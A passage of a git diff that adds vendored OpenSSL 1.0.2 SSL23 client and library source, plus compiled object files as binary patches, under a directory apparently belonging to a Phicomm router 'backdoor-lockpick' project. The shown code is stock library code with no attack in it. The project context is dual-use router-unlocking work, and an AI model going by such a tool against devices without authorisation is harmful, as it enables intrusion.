+                                            buf + SSL3_RT_MAX_PLAIN_LENGTH,
+                                            &al)) == NULL) {
+                ssl3_send_alert(s, SSL3_AL_FATAL, al);
+                SSLerr(SSL_F_SSL23_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
+                return -1;
+            }
+#endif
+
+            l = p - d;
+
+            /* fill in 4-byte handshake header */
+            d = &(buf[5]);
+            *(d++) = SSL3_MT_CLIENT_HELLO;
+            l2n3(l, d);
+
+            l += 4;
+
+            if (l > SSL3_RT_MAX_PLAIN_LENGTH) {
+                SSLerr(SSL_F_SSL23_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
+                return -1;
+            }
+
+            /* fill in 5-byte record header */
+            d = buf;
+            *(d++) = SSL3_RT_HANDSHAKE;
+            *(d++) = version_major;
+            /*
+             * Some servers hang if we use long client hellos and a record
+             * number > TLS 1.0.
+             */
+            if (TLS1_get_client_version(s) > TLS1_VERSION)
+                *(d++) = 1;
+            else
+                *(d++) = version_minor;
+            s2n((int)l, d);
+
+            /* number of bytes to write */
+            s->init_num = p - buf;
+            s->init_off = 0;
+
+            ssl3_finish_mac(s, &(buf[5]), s->init_num - 5);
+        }
+
+        s->state = SSL23_ST_CW_CLNT_HELLO_B;
+        s->init_off = 0;
+    }
+
+    /* SSL3_ST_CW_CLNT_HELLO_B */
+    ret = ssl23_write_bytes(s);
+
+    if ((ret >= 2) && s->msg_callback) {
+        /* Client Hello has been sent; tell msg_callback */
+
+        if (ssl2_compat)
+            s->msg_callback(1, SSL2_VERSION, 0, s->init_buf->data + 2,
+                            ret - 2, s, s->msg_callback_arg);
+        else {
+            s->msg_callback(1, version, SSL3_RT_HEADER, s->init_buf->data, 5,
+                            s, s->msg_callback_arg);
+            s->msg_callback(1, version, SSL3_RT_HANDSHAKE,
+                            s->init_buf->data + 5, ret - 5, s,
+                            s->msg_callback_arg);
+        }
+    }
+
+    return ret;
+}
+
+static int ssl23_get_server_hello(SSL *s)
+{
+    char buf[8];
+    unsigned char *p;
+    int i;
+    int n;
+
+    n = ssl23_read_bytes(s, 7);
+
+    if (n != 7)
+        return (n);
+    p = s->packet;
+
+    memcpy(buf, p, n);
+
+    if ((p[0] & 0x80) && (p[2] == SSL2_MT_SERVER_HELLO) &&
+        (p[5] == 0x00) && (p[6] == 0x02)) {
+#ifdef OPENSSL_NO_SSL2
+        SSLerr(SSL_F_SSL23_GET_SERVER_HELLO, SSL_R_UNSUPPORTED_PROTOCOL);
+        goto err;
+#else
+        /* we are talking sslv2 */
+        /*
+         * we need to clean up the SSLv3 setup and put in the sslv2 stuff.
+         */
+        int ch_len;
+
+        if (s->options & SSL_OP_NO_SSLv2) {
+            SSLerr(SSL_F_SSL23_GET_SERVER_HELLO, SSL_R_UNSUPPORTED_PROTOCOL);
+            goto err;
+        }
+        if (s->s2 == NULL) {
+            if (!ssl2_new(s))
+                goto err;
+        } else
+            ssl2_clear(s);
+
+        if (s->options & SSL_OP_NETSCAPE_CHALLENGE_BUG)
+            ch_len = SSL2_CHALLENGE_LENGTH;
+        else
+            ch_len = SSL2_MAX_CHALLENGE_LENGTH;
+
+        /* write out sslv2 challenge */
+        /*
+         * Note that ch_len must be <= SSL3_RANDOM_SIZE (32), because it is
+         * one of SSL2_MAX_CHALLENGE_LENGTH (32) or SSL2_MAX_CHALLENGE_LENGTH
+         * (16), but leave the check in for futurproofing
+         */
+        i = (SSL3_RANDOM_SIZE < ch_len)
+            ? SSL3_RANDOM_SIZE : ch_len;
+        s->s2->challenge_length = i;
+        memcpy(s->s2->challenge,
+               &(s->s3->client_random[SSL3_RANDOM_SIZE - i]), i);
+
+        if (s->s3 != NULL)
+            ssl3_free(s);
+
+        if (!BUF_MEM_grow_clean(s->init_buf,
+                                SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER)) {
+            SSLerr(SSL_F_SSL23_GET_SERVER_HELLO, ERR_R_BUF_LIB);
+            goto err;
+        }
+
+        s->state = SSL2_ST_GET_SERVER_HELLO_A;
+        if (!(s->client_version == SSL2_VERSION))
+            /*
+             * use special padding (SSL 3.0 draft/RFC 2246, App. E.2)
+             */
+            s->s2->ssl2_rollback = 1;
+
+        /*
+         * setup the 7 bytes we have read so we get them from the sslv2
+         * buffer
+         */
+        s->rstate = SSL_ST_READ_HEADER;
+        s->packet_length = n;
+        s->packet = &(s->s2->rbuf[0]);
+        memcpy(s->packet, buf, n);
+        s->s2->rbuf_left = n;
+        s->s2->rbuf_offs = 0;
+
+        /* we have already written one */
+        s->s2->write_sequence = 1;
+
+        s->method = SSLv2_client_method();
+        s->handshake_func = s->method->ssl_connect;
+#endif
+    } else if (p[1] == SSL3_VERSION_MAJOR &&
+               p[2] <= TLS1_2_VERSION_MINOR &&
+               ((p[0] == SSL3_RT_HANDSHAKE && p[5] == SSL3_MT_SERVER_HELLO) ||
+                (p[0] == SSL3_RT_ALERT && p[3] == 0 && p[4] == 2))) {
+        /* we have sslv3 or tls1 (server hello or alert) */
+
+#ifndef OPENSSL_NO_SSL3
+        if ((p[2] == SSL3_VERSION_MINOR) && !(s->options & SSL_OP_NO_SSLv3)) {
+# ifdef OPENSSL_FIPS
+            if (FIPS_mode()) {
+                SSLerr(SSL_F_SSL23_GET_SERVER_HELLO,
+                       SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE);
+                goto err;
+            }
+# endif
+            s->version = SSL3_VERSION;
+            s->method = SSLv3_client_method();
+        } else
+#endif
+        if ((p[2] == TLS1_VERSION_MINOR) && !(s->options & SSL_OP_NO_TLSv1)) {
+            s->version = TLS1_VERSION;
+            s->method = TLSv1_client_method();
+        } else if ((p[2] == TLS1_1_VERSION_MINOR) &&
+                   !(s->options & SSL_OP_NO_TLSv1_1)) {
+            s->version = TLS1_1_VERSION;
+            s->method = TLSv1_1_client_method();
+        } else if ((p[2] == TLS1_2_VERSION_MINOR) &&
+                   !(s->options & SSL_OP_NO_TLSv1_2)) {
+            s->version = TLS1_2_VERSION;
+            s->method = TLSv1_2_client_method();
+        } else {
+            SSLerr(SSL_F_SSL23_GET_SERVER_HELLO, SSL_R_UNSUPPORTED_PROTOCOL);
+            goto err;
+        }
+
+        /* ensure that TLS_MAX_VERSION is up-to-date */
+        OPENSSL_assert(s->version <= TLS_MAX_VERSION);
+
+        if (p[0] == SSL3_RT_ALERT && p[5] != SSL3_AL_WARNING) {
+            /* fatal alert */
+
+            void (*cb) (const SSL *ssl, int type, int val) = NULL;
+            int j;
+
+            if (s->info_callback != NULL)
+                cb = s->info_callback;
+            else if (s->ctx->info_callback != NULL)
+                cb = s->ctx->info_callback;
+
+            i = p[5];
+            if (cb != NULL) {
+                j = (i << 8) | p[6];
+                cb(s, SSL_CB_READ_ALERT, j);
+            }
+
+            if (s->msg_callback) {
+                s->msg_callback(0, s->version, SSL3_RT_HEADER, p, 5, s,
+                                s->msg_callback_arg);
+                s->msg_callback(0, s->version, SSL3_RT_ALERT, p + 5, 2, s,
+                                s->msg_callback_arg);
+            }
+
+            s->rwstate = SSL_NOTHING;
+            SSLerr(SSL_F_SSL23_GET_SERVER_HELLO, SSL_AD_REASON_OFFSET + p[6]);
+            goto err;
+        }
+
+        if (!ssl_init_wbio_buffer(s, 1))
+            goto err;
+
+        /* we are in this state */
+        s->state = SSL3_ST_CR_SRVR_HELLO_A;
+
+        /*
+         * put the 7 bytes we have read into the input buffer for SSLv3
+         */
+        s->rstate = SSL_ST_READ_HEADER;
+        s->packet_length = n;
+        if (s->s3->rbuf.buf == NULL)
+            if (!ssl3_setup_read_buffer(s))
+                goto err;
+        s->packet = &(s->s3->rbuf.buf[0]);
+        memcpy(s->packet, buf, n);
+        s->s3->rbuf.left = n;
+        s->s3->rbuf.offset = 0;
+
+        s->handshake_func = s->method->ssl_connect;
+    } else {
+        SSLerr(SSL_F_SSL23_GET_SERVER_HELLO, SSL_R_UNKNOWN_PROTOCOL);
+        goto err;
+    }
+    s->init_num = 0;
+
+    /*
+     * Since, if we are sending a ssl23 client hello, we are not reusing a
+     * session-id
+     */
+    if (!ssl_get_new_session(s, 0))
+        goto err;
+
+    return (SSL_connect(s));
+ err:
+    return (-1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_clnt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_clnt.o
new file mode 100644
index 0000000000000000000000000000000000000000..12d5e2a9ecf837285fff32bfc46e0d932d938f70
GIT binary patch
literal 9384
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
LvR#p<)$#uy0|-S}

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_lib.c
new file mode 100644
index 0000000..9056d39
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_lib.c
@@ -0,0 +1,185 @@
+/* ssl/s23_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+
+long ssl23_default_timeout(void)
+{
+    return (300);
+}
+
+int ssl23_num_ciphers(void)
+{
+    return (ssl3_num_ciphers()
+#ifndef OPENSSL_NO_SSL2
+            + ssl2_num_ciphers()
+#endif
+        );
+}
+
+const SSL_CIPHER *ssl23_get_cipher(unsigned int u)
+{
+    unsigned int uu = ssl3_num_ciphers();
+
+    if (u < uu)
+        return (ssl3_get_cipher(u));
+    else
+#ifndef OPENSSL_NO_SSL2
+        return (ssl2_get_cipher(u - uu));
+#else
+        return (NULL);
+#endif
+}
+
+/*
+ * This function needs to check if the ciphers required are actually
+ * available
+ */
+const SSL_CIPHER *ssl23_get_cipher_by_char(const unsigned char *p)
+{
+    const SSL_CIPHER *cp;
+
+    cp = ssl3_get_cipher_by_char(p);
+#ifndef OPENSSL_NO_SSL2
+    if (cp == NULL)
+        cp = ssl2_get_cipher_by_char(p);
+#endif
+    return (cp);
+}
+
+int ssl23_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p)
+{
+    long l;
+
+    /* We can write SSLv2 and SSLv3 ciphers */
+    /* but no ECC ciphers */
+    if (c->algorithm_mkey == SSL_kECDHr ||
+        c->algorithm_mkey == SSL_kECDHe ||
+        c->algorithm_mkey == SSL_kEECDH ||
+        c->algorithm_auth == SSL_aECDH || c->algorithm_auth == SSL_aECDSA)
+        return 0;
+    if (p != NULL) {
+        l = c->id;
+        p[0] = ((unsigned char)(l >> 16L)) & 0xFF;
+        p[1] = ((unsigned char)(l >> 8L)) & 0xFF;
+        p[2] = ((unsigned char)(l)) & 0xFF;
+    }
+    return (3);
+}
+
+int ssl23_read(SSL *s, void *buf, int len)
+{
+    int n;
+
+    clear_sys_error();
+    if (SSL_in_init(s) && (!s->in_handshake)) {
+        n = s->handshake_func(s);
+        if (n < 0)
+            return (n);
+        if (n == 0) {
+            SSLerr(SSL_F_SSL23_READ, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+        return (SSL_read(s, buf, len));
+    } else {
+        ssl_undefined_function(s);
+        return (-1);
+    }
+}
+
+int ssl23_peek(SSL *s, void *buf, int len)
+{
+    int n;
+
+    clear_sys_error();
+    if (SSL_in_init(s) && (!s->in_handshake)) {
+        n = s->handshake_func(s);
+        if (n < 0)
+            return (n);
+        if (n == 0) {
+            SSLerr(SSL_F_SSL23_PEEK, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+        return (SSL_peek(s, buf, len));
+    } else {
+        ssl_undefined_function(s);
+        return (-1);
+    }
+}
+
+int ssl23_write(SSL *s, const void *buf, int len)
+{
+    int n;
+
+    clear_sys_error();
+    if (SSL_in_init(s) && (!s->in_handshake)) {
+        n = s->handshake_func(s);
+        if (n < 0)
+            return (n);
+        if (n == 0) {
+            SSLerr(SSL_F_SSL23_WRITE, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+        return (SSL_write(s, buf, len));
+    } else {
+        ssl_undefined_function(s);
+        return (-1);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..4f83c01140c87cbf4be9f4a53e20a45df859dc25
GIT binary patch
literal 3552
zcmc(h-D_M$6u@V*(WYtKZnf4eDY8NktI1_I3DlHUvPpLLMiwhc7C{Wx{kUnC>=$?E
z+C<|Agcg^ykOyA`ANnZbA5i+BTN^RH`QnQ&)(1sfrHG~0Qd!TLJExhQ?1DzY19#`l
zZ_YV$?wq+Z`*u8)=<@j(iH|+UwtGYwyV$#}j|+92J;eIhZ~Gs=dub3nuA=r6j-X<$
z{T!;V4)pzqU>%gPJFo3E*EU1KBHBPz^H@)Y%nL7GGk^c=+h()LPnaj)0bf39t|!Ch
z+MOVO8h*$5z$HIm^XzSYWMMrSG}m7Wp1WpVxf^`<&_X@o6Qft74G}z+j@7@8%}v*D
zrOo=EA{VoM^9%52jC!{>BmCsrn}f_f)=WpvHkO}t`{U6@^vlcNgViU?@bl?GvcD0U
zs$Wmle}E|Su~%aA;%!8vwXLQg|JA&|{7>_){L^_^a&q!`_^EW(Eps<KW{en-q3AJJ
zbfa$#M~ukmQ4d38#=7AN!t($;$rsYBi?IeWEGh~vHHz=`8RlCK`uh9!^lZTPLZ2gI
zgfZHR$Rd*Ml`Yy#N&P6cW+0sI4fMqKB?3LrMV~x!5b{BWbw-)<8a4{;d8v!BL?C#f
zD;@})_fG}F=eoOQdIO<}KyU&>Pm{`o-{vm;?(M=)y6kB18}4SmHg^mF@VEWKky8~~
zz5JqTtqgm9_TWw^_?`|NE3i}iVmGw%eb9Ya$&+gSgyhtx8jb+RI_feFpdEi1IL3cO
zI*7dj`cen`H>CXuX;1UM*TMc{X&;yNw68vw{C&x3-+cxBc6ol+f#2xB|LDNG<TnJv
zEpiw*uEPOnQ7E5*4)#ORzOLDib+Bi(;SsA?$Qn6Ts}(`d+Y1@D$Sqzd*%g;dT6RlT
zu25aHof@-}sZ$fNlyxeRn2pa_bFqn3+(Nq%OEvStowm7j^ekHYFyA(?vMW|@G2`fl
zDhG$EOA)mJ$Ij%LW!a8Xu2{uNF2f6zGMk-ESv8*FHjB^92xl;;ID!ig$kTGm@Y;p4
zowpX;a!&Yp=~r!gNtg=7V`rQKM8mkACh8Ivzux)T2l_p@BT;alq2L*cdztuUgdoTd
z!bAKzLJ;JS!b7}U))V<-3denbqQ@UrxEepJa5es_!qxa6C|u3|BZaH+zfrgv|CYkl
z`1`%|MgHo#MHL<Zoz@|yaQq&L(?N>sa7f{2lz9&;{HDVD6&?m11@1lZhz|UWN`*L`
zZ>GlSyjs*aolC14r}Jk+<8=OPX`IdhI(jJ|`resQTPg8O7FzCj?ILN8UCbEVUgpfm
zXLyDg*;<Vmxk{;Imw}Zl+&19OAA-*%w<P<g%dSy%DplLzE6flP>_uzA$&_rF*}rST
z;EtuxZ>n)%C_a2aMP%9T6RaK9eEdG~ln><<w<R60UZ~Oy7n1f*O0M6mF>PLHPRmYR
zHV7KV+^s+EbIdCOk190(Gb#j~-k;jz3R6vse>4B*!3md2H?K+%R)d00>qj^X3g)8w
zZ%7cKM5Tl7KM%ZJ{i^Z;Z%99^ANrC%)vw*$=+ck{xhV6%|0@_$_eZAJ4iI})ZpcY3
Uf33?7bnuVJ1EPq*6w&?v0-st(iU0rr

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_meth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_meth.c
new file mode 100644
index 0000000..eb76098
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_meth.c
@@ -0,0 +1,89 @@
+/* ssl/s23_meth.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
